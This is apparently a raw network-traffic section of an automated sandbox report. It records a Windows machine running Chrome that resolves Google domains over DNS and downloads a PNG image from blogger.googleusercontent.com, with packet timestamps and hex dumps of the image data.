Jan 2, 2025 10:28:34.856498957 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.856507063 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.862798929 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.862925053 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.862932920 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.869164944 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.869216919 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.869227886 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.875400066 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.875451088 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.875459909 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.881690979 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.881753922 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.881763935 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.888096094 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.888166904 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.888181925 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.894277096 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.894340038 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.894347906 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.900237083 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.900295973 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.900302887 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.905592918 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.905798912 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.905807018 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.911042929 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.911098957 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.911107063 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.911168098 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.911266088 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.911395073 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.911416054 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.911442041 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.911467075 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:35.832268000 CET	443	49703	23.1.237.91	192.168.2.5
Jan 2, 2025 10:28:35.833142996 CET	49703	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:36.699915886 CET	49715	443	192.168.2.5	142.250.186.164
Jan 2, 2025 10:28:36.699944973 CET	443	49715	142.250.186.164	192.168.2.5
Jan 2, 2025 10:28:36.700001955 CET	49715	443	192.168.2.5	142.250.186.164
Jan 2, 2025 10:28:36.700273991 CET	49715	443	192.168.2.5	142.250.186.164
Jan 2, 2025 10:28:36.700285912 CET	443	49715	142.250.186.164	192.168.2.5
Jan 2, 2025 10:28:37.336690903 CET	443	49715	142.250.186.164	192.168.2.5
Jan 2, 2025 10:28:37.337172985 CET	49715	443	192.168.2.5	142.250.186.164
Jan 2, 2025 10:28:37.337182999 CET	443	49715	142.250.186.164	192.168.2.5
Jan 2, 2025 10:28:37.338288069 CET	443	49715	142.250.186.164	192.168.2.5
Jan 2, 2025 10:28:37.338376999 CET	49715	443	192.168.2.5	142.250.186.164
Jan 2, 2025 10:28:37.339673996 CET	49715	443	192.168.2.5	142.250.186.164
Jan 2, 2025 10:28:37.339740992 CET	443	49715	142.250.186.164	192.168.2.5
Jan 2, 2025 10:28:37.392849922 CET	49715	443	192.168.2.5	142.250.186.164
Jan 2, 2025 10:28:37.392863989 CET	443	49715	142.250.186.164	192.168.2.5
Jan 2, 2025 10:28:37.439757109 CET	49715	443	192.168.2.5	142.250.186.164
Jan 2, 2025 10:28:46.847604036 CET	49703	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:46.847917080 CET	49703	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:46.848393917 CET	49729	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:46.848417997 CET	443	49729	23.1.237.91	192.168.2.5
Jan 2, 2025 10:28:46.848490953 CET	49729	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:46.848706961 CET	49729	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:46.848721027 CET	443	49729	23.1.237.91	192.168.2.5
Jan 2, 2025 10:28:46.852411032 CET	443	49703	23.1.237.91	192.168.2.5
Jan 2, 2025 10:28:46.852693081 CET	443	49703	23.1.237.91	192.168.2.5
Jan 2, 2025 10:28:47.265327930 CET	443	49715	142.250.186.164	192.168.2.5
Jan 2, 2025 10:28:47.265403032 CET	443	49715	142.250.186.164	192.168.2.5
Jan 2, 2025 10:28:47.265858889 CET	49715	443	192.168.2.5	142.250.186.164
Jan 2, 2025 10:28:47.568130970 CET	443	49729	23.1.237.91	192.168.2.5
Jan 2, 2025 10:28:47.568213940 CET	49729	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:48.520106077 CET	49715	443	192.168.2.5	142.250.186.164
Jan 2, 2025 10:28:48.520133972 CET	443	49715	142.250.186.164	192.168.2.5
Jan 2, 2025 10:29:06.721776962 CET	443	49729	23.1.237.91	192.168.2.5
Jan 2, 2025 10:29:06.722115040 CET	49729	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:29:18.486829042 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:29:18.486848116 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:29:34.519706011 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:29:34.519859076 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:29:34.519964933 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:29:36.761307001 CET	49998	443	192.168.2.5	142.250.186.36
Jan 2, 2025 10:29:36.761341095 CET	443	49998	142.250.186.36	192.168.2.5
Jan 2, 2025 10:29:36.761423111 CET	49998	443	192.168.2.5	142.250.186.36
Jan 2, 2025 10:29:36.761651039 CET	49998	443	192.168.2.5	142.250.186.36
Jan 2, 2025 10:29:36.761658907 CET	443	49998	142.250.186.36	192.168.2.5
Jan 2, 2025 10:29:37.438688040 CET	443	49998	142.250.186.36	192.168.2.5
Jan 2, 2025 10:29:37.439069986 CET	49998	443	192.168.2.5	142.250.186.36
Jan 2, 2025 10:29:37.439084053 CET	443	49998	142.250.186.36	192.168.2.5
Jan 2, 2025 10:29:37.439405918 CET	443	49998	142.250.186.36	192.168.2.5
Jan 2, 2025 10:29:37.439852953 CET	49998	443	192.168.2.5	142.250.186.36
Jan 2, 2025 10:29:37.439904928 CET	443	49998	142.250.186.36	192.168.2.5
Jan 2, 2025 10:29:37.486377954 CET	49998	443	192.168.2.5	142.250.186.36
Jan 2, 2025 10:29:47.320811987 CET	443	49998	142.250.186.36	192.168.2.5
Jan 2, 2025 10:29:47.320887089 CET	443	49998	142.250.186.36	192.168.2.5
Jan 2, 2025 10:29:47.320951939 CET	49998	443	192.168.2.5	142.250.186.36
Jan 2, 2025 10:29:48.520032883 CET	49998	443	192.168.2.5	142.250.186.36
Jan 2, 2025 10:29:48.520066977 CET	443	49998	142.250.186.36	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 10:28:32.153146982 CET	53	62687	1.1.1.1	192.168.2.5
Jan 2, 2025 10:28:32.221335888 CET	53	55980	1.1.1.1	192.168.2.5
Jan 2, 2025 10:28:32.342587948 CET	65171	53	192.168.2.5	1.1.1.1
Jan 2, 2025 10:28:32.342782021 CET	54358	53	192.168.2.5	1.1.1.1
Jan 2, 2025 10:28:32.349498987 CET	53	65171	1.1.1.1	192.168.2.5
Jan 2, 2025 10:28:32.350179911 CET	53	54358	1.1.1.1	192.168.2.5
Jan 2, 2025 10:28:33.238313913 CET	53	55649	1.1.1.1	192.168.2.5
Jan 2, 2025 10:28:33.686681032 CET	54451	53	192.168.2.5	1.1.1.1
Jan 2, 2025 10:28:33.686857939 CET	62598	53	192.168.2.5	1.1.1.1
Jan 2, 2025 10:28:33.693598986 CET	53	54451	1.1.1.1	192.168.2.5
Jan 2, 2025 10:28:33.694916964 CET	53	62598	1.1.1.1	192.168.2.5
Jan 2, 2025 10:28:36.691875935 CET	50355	53	192.168.2.5	1.1.1.1
Jan 2, 2025 10:28:36.692071915 CET	64932	53	192.168.2.5	1.1.1.1
Jan 2, 2025 10:28:36.698713064 CET	53	64932	1.1.1.1	192.168.2.5
Jan 2, 2025 10:28:36.698823929 CET	53	50355	1.1.1.1	192.168.2.5
Jan 2, 2025 10:28:36.808481932 CET	53	50187	1.1.1.1	192.168.2.5
Jan 2, 2025 10:28:50.245443106 CET	53	55263	1.1.1.1	192.168.2.5
Jan 2, 2025 10:29:09.190607071 CET	53	52727	1.1.1.1	192.168.2.5
Jan 2, 2025 10:29:31.965883970 CET	53	58596	1.1.1.1	192.168.2.5
Jan 2, 2025 10:29:31.995065928 CET	53	50889	1.1.1.1	192.168.2.5
Jan 2, 2025 10:29:36.753509045 CET	59353	53	192.168.2.5	1.1.1.1
Jan 2, 2025 10:29:36.753655910 CET	57559	53	192.168.2.5	1.1.1.1
Jan 2, 2025 10:29:36.760431051 CET	53	59353	1.1.1.1	192.168.2.5
Jan 2, 2025 10:29:36.760448933 CET	53	57559	1.1.1.1	192.168.2.5
Jan 2, 2025 10:30:02.250612974 CET	53	62533	1.1.1.1	192.168.2.5
Jan 2, 2025 10:30:47.963670015 CET	53	59458	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 10:28:32.342587948 CET	192.168.2.5	1.1.1.1	0xe13e	Standard query (0)	blogger.googleusercontent.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 10:28:32.342782021 CET	192.168.2.5	1.1.1.1	0x5900	Standard query (0)	blogger.googleusercontent.com	65	IN (0x0001)	false
Jan 2, 2025 10:28:33.686681032 CET	192.168.2.5	1.1.1.1	0x3732	Standard query (0)	blogger.googleusercontent.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 10:28:33.686857939 CET	192.168.2.5	1.1.1.1	0xa5b5	Standard query (0)	blogger.googleusercontent.com	65	IN (0x0001)	false
Jan 2, 2025 10:28:36.691875935 CET	192.168.2.5	1.1.1.1	0x9b1e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 10:28:36.692071915 CET	192.168.2.5	1.1.1.1	0x5819	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 2, 2025 10:29:36.753509045 CET	192.168.2.5	1.1.1.1	0xda7e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 10:29:36.753655910 CET	192.168.2.5	1.1.1.1	0x2c21	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 10:28:32.349498987 CET	1.1.1.1	192.168.2.5	0xe13e	No error (0)	blogger.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 10:28:32.349498987 CET	1.1.1.1	192.168.2.5	0xe13e	No error (0)	googlehosted.l.googleusercontent.com		172.217.16.193	A (IP address)	IN (0x0001)	false
Jan 2, 2025 10:28:32.350179911 CET	1.1.1.1	192.168.2.5	0x5900	No error (0)	blogger.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 10:28:33.693598986 CET	1.1.1.1	192.168.2.5	0x3732	No error (0)	blogger.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 10:28:33.693598986 CET	1.1.1.1	192.168.2.5	0x3732	No error (0)	googlehosted.l.googleusercontent.com		142.250.186.65	A (IP address)	IN (0x0001)	false
Jan 2, 2025 10:28:33.694916964 CET	1.1.1.1	192.168.2.5	0xa5b5	No error (0)	blogger.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 10:28:36.698713064 CET	1.1.1.1	192.168.2.5	0x5819	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 2, 2025 10:28:36.698823929 CET	1.1.1.1	192.168.2.5	0x9b1e	No error (0)	www.google.com		142.250.186.164	A (IP address)	IN (0x0001)	false
Jan 2, 2025 10:29:36.760431051 CET	1.1.1.1	192.168.2.5	0xda7e	No error (0)	www.google.com		142.250.186.36	A (IP address)	IN (0x0001)	false
Jan 2, 2025 10:29:36.760448933 CET	1.1.1.1	192.168.2.5	0x2c21	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

blogger.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	172.217.16.193	443	2568	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 09:28:33 UTC	877	OUT	GET /img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s6RP4K82VxMGwK5IE25cXnzwGDfx2tEnAiZBfzgYML-pfkuxpvqP72-v0eFpETk20PZCVhHnQOaGa2XQ7_XEEkfvlBt-DyP8340HFGybdoWWh9Ai54XC0uZoP7hPIjO49whnc1qFk5MX5UqRrvkId8/s2160/image.png HTTP/1.1 Host: blogger.googleusercontent.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 09:28:33 UTC	465	IN	HTTP/1.1 200 OK Content-Type: image/png Vary: Origin Access-Control-Expose-Headers: Content-Length ETag: "v16b" Expires: Fri, 03 Jan 2025 09:28:33 GMT Cache-Control: public, max-age=86400, no-transform Content-Disposition: inline;filename="image.png" X-Content-Type-Options: nosniff Date: Thu, 02 Jan 2025 09:28:33 GMT Server: fife Content-Length: 52776 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-02 09:28:33 UTC	925	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 08 70 08 02 00 00 00 c0 ae cc 3e 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ec dd 41 6c d6 f7 7d c7 f1 07 62 07 ec 4c cf e3 ec 89 c6 b3 0e fc 98 68 a3 5a 23 ec a7 5b aa 15 84 e1 69 a7 69 a9 64 84 a5 6d 6a 17 2c e1 9c 12 95 4a 45 3b b4 52 72 f1 25 3d e4 e4 4a a5 2a 87 a9 8e 44 b4 e6 e6 ca 48 e5 12 d5 04 b6 44 4b 0f c6 28 95 9a 43 b0 0d 9b 1c 69 Data Ascii: PNGIHDRpp>sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATxAl}bLhZ#[iidmj,JE;Rr%=J*DHDK(Ci
2025-01-02 09:28:33 UTC	1390	IN	Data Raw: 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 Data Ascii: A T@@PA T@@PA T@@PA
2025-01-02 09:28:33 UTC	1390	IN	Data Raw: 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 Data Ascii: A T@@PA T@@PA T@@P*A T
2025-01-02 09:28:33 UTC	1390	IN	Data Raw: 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 Data Ascii: T@@PA T@@PA T@@P*A T@@
2025-01-02 09:28:33 UTC	1390	IN	Data Raw: e1 ba 9a 92 63 e5 53 67 34 15 00 00 e0 d1 09 2a 00 00 f0 29 8a 83 b5 13 3f f9 a9 9a 92 6f c5 e3 43 a7 df 99 2b 0e d6 52 0f 01 00 00 32 40 50 01 00 80 4f da bc e9 2b f5 0a f6 42 4f 7f f5 e4 f5 59 4d 05 00 00 08 09 2a 00 00 f0 ff 78 37 a5 d3 74 15 4b 9a 0a 00 00 10 12 54 00 00 e0 ff a8 29 9d 49 53 01 00 00 42 82 0a 00 00 fc 5a 77 a9 4f 4d e9 58 9a 0a 00 00 f0 70 82 0a 00 00 14 0a 85 42 77 a9 ef 84 9a d2 d9 34 15 00 00 e0 21 04 15 00 00 28 14 0a 85 67 df 9c 2e 1e 1f 4a bd 82 c4 34 15 00 00 e0 f7 11 54 00 00 a0 50 bb 32 55 3e 75 26 f5 0a da 82 a6 02 00 00 7c 2a 41 05 00 80 4e 77 64 6c fc f0 f9 0b a9 57 d0 46 36 9b 4a 6f 75 20 f5 10 00 00 a0 8d 08 2a 00 00 74 b4 e2 60 6d e8 07 3f 4c bd 82 b6 d3 55 2c 3d fb a3 e9 ee 52 5f ea 21 00 00 40 bb 10 54 00 00 e8 5c dd Data Ascii: cSg4)?oC+R2@PO+BOYMx7tKT)ISBZwOMXpBw4!(g.J4TP2U>u&\|ANwdlWF6Jou t`m?LU,=R_!@T\
2025-01-02 09:28:33 UTC	1390	IN	Data Raw: f5 00 00 00 68 8d 43 23 a3 a9 27 ec 91 bb df ff ee 3b cf d5 53 9d 7b f8 e0 3b 13 b7 5f 7a 21 c9 47 67 d1 d3 df b8 d4 5d ea 4b bd 02 00 00 68 01 41 05 00 80 3c e8 ad 0e 54 46 ce a5 5e b1 17 6e bf f4 c2 fb df ba 94 76 c3 bd ab 53 6f 9f fc fc 46 b3 91 76 46 26 74 15 4b 47 2f 26 fe f3 02 00 00 5a 42 50 01 00 20 0f 3a e1 78 ca 46 b3 71 fb a5 17 ee 5d 9d 4a 3d a4 50 28 14 9a f3 73 ff f6 5c 5d 53 79 14 0e a9 00 00 40 3e 08 2a 00 00 e4 c1 91 b1 f1 d4 13 76 dd 7b 5f 1d 6d 93 9a b2 a9 39 3f f7 de 57 f3 df b1 76 ce 21 15 00 00 c8 07 41 05 00 80 cc eb ad 0e 14 8f 0f a5 5e b1 bb 6e bf f4 42 1b be 6d be 72 73 d6 7b 2a 8f c2 21 15 00 00 c8 81 c7 9e 7f 3c f5 04 00 00 d8 99 a3 17 2f 95 87 eb a9 57 ec a2 f6 b9 e9 eb 77 35 e7 e7 ba fb 9e 7c f2 0b 5f 4c 3d a4 ad ed 3f 70 f0 Data Ascii: hC#';S{;_z!Gg]KhA<TF^nvSoFvF&tKG/&ZBP :xFq]J=P(s\]Sy@>v{_m9?Wv!A^nBmrs{!</Ww5\|_L=?p
2025-01-02 09:28:33 UTC	1390	IN	Data Raw: 00 6d 4c 50 01 00 20 33 ca a7 ce a4 9e d0 32 1d f5 80 ca 26 ef d2 87 7a fa ab bd f9 aa 86 00 00 90 27 82 0a 00 00 d9 90 b3 7f 68 ee a8 e3 29 9b d6 3a 2c 20 6d cf 21 87 54 00 00 a0 5d 09 2a 00 00 64 43 4f ff 40 ea 09 ad d4 81 c7 35 3a ed 44 ce f6 78 46 05 00 00 da 96 a0 02 00 40 36 e4 ec 1f 9a 3b f0 84 4a f3 4e c7 35 a4 6d a8 8c 9c 4b 3d 01 00 00 f8 74 82 0a 00 00 d9 d0 dd d7 97 7a 42 2b 35 3b ef 84 ca fa ea 6a ea 09 d9 90 b3 76 08 00 00 b9 21 a8 00 00 90 0d c5 c1 5a ea 09 2d b3 72 eb 46 ea 09 09 74 e0 a1 9c ed a9 9c f5 8c 0a 00 00 b4 23 41 05 00 80 6c 28 e5 28 a8 74 e0 f1 14 1e 9d 13 2a 00 00 d0 9e 04 15 00 00 b2 a1 ab 58 4a 3d a1 65 3a 36 a8 34 ef dc 4e 3d 21 03 8a c7 87 ba 4b b9 ba e0 0e 00 00 f2 41 50 01 00 20 03 72 f6 7f f6 1f 2c 2e a4 9e 90 c6 7a c3 Data Ascii: mLP 32&z'h):, m!T]dCO@5:DxF@6;JN5mK=tzB+5;jv!Z-rFt#Al((tXJ=e:64N=!KAP r,.z
2025-01-02 09:28:33 UTC	1390	IN	Data Raw: b3 8e d0 00 00 40 18 85 0a 00 00 40 1a 8a 2b 2b d1 11 00 00 a0 b9 14 2a 00 00 00 00 00 00 a7 50 a8 00 00 00 55 b0 f2 0b 00 00 48 9a 42 05 00 00 20 0d 1d 2b bf 00 00 20 8e 42 05 00 00 aa e0 fa 85 83 ea 17 37 55 74 a2 23 00 00 40 73 29 54 00 00 a0 0a ed 4e d3 eb 04 95 12 00 00 90 34 85 0a 00 00 00 00 00 c0 29 14 2a 00 00 40 15 dc ff 28 c5 4c b7 17 1d 01 00 00 1a 4a a1 02 00 00 54 c1 fd 8f 52 4c 2f f6 a2 23 00 00 40 43 29 54 00 00 a8 af a3 bd dd e8 08 94 c3 09 19 00 00 20 75 0a 15 00 00 ea eb b0 bf 1b 1d 81 72 b8 48 0f 00 00 a4 4e a1 02 00 00 00 00 00 70 0a 85 0a 00 00 54 a1 3d db e8 9d 57 73 57 af 45 47 00 00 00 b8 10 85 0a 00 00 54 a1 58 b2 f3 8a 12 a8 a6 00 00 20 8a 42 05 00 00 98 b8 99 6e 2f 3a 02 00 00 c0 85 28 54 00 00 80 89 9b 56 a8 00 00 00 89 53 a8 Data Ascii: @@++PUHB + B7Ut#@s)TN4)@(LJTRL/#@C)T urHNpT=WsWEGTX Bn/:(TVS
2025-01-02 09:28:33 UTC	1390	IN	Data Raw: a3 9d 67 d1 11 ca 31 b7 ba 16 1d 61 22 e6 3e b8 16 1d 01 00 00 60 22 14 2a 00 00 a4 e4 78 78 10 1d a1 34 59 6e c7 9a c9 f4 36 4c 1d 64 d3 26 02 00 40 a2 14 2a 00 00 a4 64 f0 78 33 3a 42 69 f2 bb 4b df ee cc 4e 2f 76 a3 53 64 2b a7 36 11 00 00 52 a4 50 01 00 20 25 39 dd a5 9f bb 7a 2d 3a 42 c9 8a 2b 0e a8 00 00 00 d9 52 a8 00 00 90 12 77 e9 eb 2c bf 8a a8 56 8e 32 fa f0 03 00 40 8a 14 2a 00 00 a4 64 b4 bd 15 1d a1 34 f9 cd 73 64 79 15 a6 3e 72 6a 13 01 00 20 45 0a 15 00 00 52 92 d3 19 89 4e 76 85 4a 7e 15 11 00 00 c0 af 28 54 00 00 48 cc e0 e9 a3 e8 08 e5 98 2a 3a ed 4e 56 5b bf 8a a5 e5 e8 08 39 1b ed e4 33 9e 05 00 00 29 52 a8 00 00 90 98 9c 2e 49 e4 34 d2 e1 80 ca a4 1d 1f e4 33 9e 05 00 00 29 52 a8 00 00 90 98 9c 2e 49 e4 54 42 38 a0 02 00 00 e4 4d a1 Data Ascii: g1a">`"xx4Yn6Ld&@dx3:BiKN/vSd+6RP %9z-:B+Rw,V2@d4sdy>rj ERNvJ~(TH:NV[93)R.I43)R.ITB8M
2025-01-02 09:28:33 UTC	1390	IN	Data Raw: 9c 86 54 a6 17 bb 33 dd 5e 74 8a 97 14 57 56 a6 8a 4e 74 8a a6 18 3c de 8c 8e 00 00 00 bc 44 a1 02 00 40 3e 72 2a 54 5a f5 1b 52 a9 5b 9e bc b9 48 0f 00 00 75 a3 50 01 00 20 1f a3 ed ad e8 08 65 aa 5b 81 51 b7 3c 79 73 91 1e 00 00 ea 46 a1 02 00 40 3e 0e fb bb 47 7b fd e8 14 a5 a9 5b 81 e1 80 4a 95 32 6b 07 01 00 20 03 0a 15 00 00 b2 92 d3 d6 af 5a 9d 51 99 e9 f6 a6 17 bb d1 29 9a e2 64 34 74 94 1e 00 00 ea 46 a1 02 00 40 56 86 79 7d af bf 3e 43 2a f5 49 d2 04 99 7d 8c 01 00 20 0f 0a 15 00 00 b2 92 d3 84 4a ab d5 7a e7 fa 8d e8 08 2f 28 54 aa 64 df 17 00 00 d4 90 42 05 00 80 ac 8c b6 b7 4e 46 c3 e8 14 a5 79 fb 83 6b d1 11 5e 28 1c 50 a9 d0 f1 81 7d 5f 00 00 50 3b 0a 15 00 00 72 f3 f5 e3 cd e8 08 a5 99 2a 3a 75 68 32 da 9d d9 62 69 39 3a 45 83 64 36 68 05 Data Ascii: T3^tWVNt<D@>rTZR[HuP e[Q<ysF@>G{[J2k ZQ)d4tF@Vy}>CI} Jz/(TdBNFyk^(P}_P;r*:uh2bi9:Ed6h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	142.250.186.65	443	2568	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
